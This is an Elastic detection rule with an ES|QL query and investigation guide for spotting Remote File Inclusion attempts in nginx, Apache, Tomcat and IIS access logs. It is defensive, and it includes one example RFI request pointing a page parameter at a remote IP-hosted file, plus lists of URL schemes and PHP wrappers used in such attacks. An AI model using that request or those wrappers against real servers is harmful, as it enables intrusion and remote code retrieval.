Web Server Potential Remote File Inclusion Activity

  1[metadata]
  2creation_date = "2025/12/02"
  3integration = ["nginx", "apache", "apache_tomcat", "iis"]
  4maturity = "production"
  5min_stack_version = "9.2.0"
  6min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0"
  7updated_date = "2025/12/08"
  8
  9[rule]
 10author = ["Elastic"]
 11description = """
 12This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that
 13attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may
 14exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
 15"""
 16from = "now-11m"
 17interval = "10m"
 18language = "esql"
 19license = "Elastic License v2"
 20name = "Web Server Potential Remote File Inclusion Activity"
 21note = """## Triage and analysis
 22
 23> **Disclaimer**:
 24> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
 25
 26### Investigating Web Server Potential Remote File Inclusion Activity
 27
 28This rule identifies successful GET requests that pass a remote URL or raw IP in a parameter, signaling Remote File Inclusion attempts that coerce the app to fetch external content or reveal local files. RFI matters because it enables discovery, leaks sensitive data, and can bootstrap code retrieval for persistence or command-and-control. Example behavior: probing an include endpoint with /index.php?page=http://203.0.113.10/drop.txt to verify remote fetch and execution via a vulnerable loader.
 29
 30### Possible investigation steps
 31
 32- Decode the full request URL and parameters, identify the endpoint and parameter names, and confirm with application owners whether passing remote URLs is expected behavior for that route.
 33- Correlate the event time with outbound connections from the web server to the referenced domain or IP using egress firewall, proxy, DNS, or NetFlow logs to verify whether a fetch occurred.
 34- Review adjacent web access entries from the same source IP and user agent to detect scanning behavior, varied include parameters, wrapper strings (php://, data://, file://), or local file probes that indicate exploitation attempts.
 35- Check the referenced remote domain or IP with threat intelligence, and if needed, safely retrieve it in an isolated environment to examine content, redirects, and headers for droppers or callbacks.
 36- Look for post-inclusion artifacts by checking webroot and temp directories for newly created or modified files, suspicious script writes, and unusual access patterns, and inspect server or application configuration for risky URL include settings.
 37
 38### False positive analysis
 39
 40- Applications that legitimately accept full URLs in query parameters for link previews, content proxies, image fetching, or feed importers (e.g., url= or src=) will return 200 and match *=http(s)://*, appearing as RFI despite expected behavior.
 41- Administrative or diagnostic endpoints that allow users to supply IP addresses or URI schemes (ftp://, smb://, file://) to test connectivity or preview resources (e.g., target=192.168.1.10) can return 200 and trigger this rule even though no inclusion vulnerability is present.
 42
 43### Response and remediation
 44
 45- Immediately block offending source IPs and request patterns at the WAF/reverse proxy (e.g., GETs where page=, url=, or src= contains http://, https://, ftp://, smb://, or file://) and temporarily disable the affected include/loader endpoints until fixed.
 46- Restrict outbound connections from the web server to the domains and IPs referenced in the requests and quarantine the host if 200 OK responses align with remote downloads or wrapper usage such as php://, data://, file://.
 47- Collect forensic images, then remove newly created or modified scripts in webroot and temp directories (e.g., /var/www, uploads, /tmp), delete unauthorized .htaccess/web.config entries, clear caches, and terminate suspicious processes running under the web server account.
 48- Redeploy the application from a known-good build, restore clean configuration files, rotate credentials exposed by local file probes (e.g., config.php, .env), invalidate sessions, and verify functionality before returning the service to production.
 49- Harden by disabling risky features and enforcing strict input controls: set PHP allow_url_include=Off and allow_url_fopen=Off, apply open_basedir restrictions, implement scheme/domain allowlists for any include/load functionality, and sanitize and normalize user-supplied parameters.
 50- Escalate to incident response and preserve disk and memory images if remote content was fetched and executed, a webshell or unknown script is found in the webroot, or the same actor generates successful 200 RFI-style requests across multiple hosts.
 51- Enhance monitoring for RFI attempts by tuning WAF rules to alert on suspicious include parameters, enabling detailed web server logging, and setting up alerts for anomalous outbound connections from web servers.
 52"""
 53risk_score = 21
 54rule_id = "45d099b4-a12e-4913-951c-0129f73efb41"
 55severity = "low"
 56tags = [
 57    "Domain: Web",
 58    "Use Case: Threat Detection",
 59    "Tactic: Discovery",
 60    "Tactic: Command and Control",
 61    "Data Source: Nginx",
 62    "Data Source: Apache",
 63    "Data Source: Apache Tomcat",
 64    "Data Source: IIS",
 65    "Resources: Investigation Guide",
 66]
 67timestamp_override = "event.ingested"
 68type = "esql"
 69query = '''
 70from
 71  logs-nginx.access-*,
 72  logs-apache.access-*,
 73  logs-apache_tomcat.access-*,
 74  logs-iis.access-*
 75| where
 76    http.request.method == "GET" and
 77    http.response.status_code == 200 and
 78    url.original like "*=*"
 79
 80| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original))
 81
 82| where
 83    Esql.url_original_url_decoded_to_lower like "*=http://*" or
 84    Esql.url_original_url_decoded_to_lower like "*=https://*" or
 85    Esql.url_original_url_decoded_to_lower like "*=ftp://*" or
 86    Esql.url_original_url_decoded_to_lower like "*=smb://*" or
 87    Esql.url_original_url_decoded_to_lower like "*=file://*" or
 88    Esql.url_original_url_decoded_to_lower rlike """.*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*"""
 89
 90| keep
 91    @timestamp,
 92    Esql.url_original_url_decoded_to_lower,
 93    source.ip,
 94    agent.id,
 95    host.name,
 96    http.request.method,
 97    http.response.status_code,
 98    event.dataset,
 99    data_stream.namespace
100
101| stats
102    Esql.event_count = count(),
103    Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower),
104    Esql.host_name_values = values(host.name),
105    Esql.agent_id_values = values(agent.id),
106    Esql.http_request_method_values = values(http.request.method),
107    Esql.http_response_status_code_values = values(http.response.status_code),
108    Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower),
109    Esql.event_dataset_values = values(event.dataset),
110    Esql.data_stream_namespace_values = values(data_stream.namespace)
111    by source.ip
112'''
113
114[[rule.threat]]
115framework = "MITRE ATT&CK"
116
117[[rule.threat.technique]]
118id = "T1083"
119name = "File and Directory Discovery"
120reference = "https://attack.mitre.org/techniques/T1083/"
121
122[rule.threat.tactic]
123id = "TA0007"
124name = "Discovery"
125reference = "https://attack.mitre.org/tactics/TA0007/"
126
127[[rule.threat]]
128framework = "MITRE ATT&CK"
129
130[rule.threat.tactic]
131id = "TA0011"
132name = "Command and Control"
133reference = "https://attack.mitre.org/tactics/TA0011/"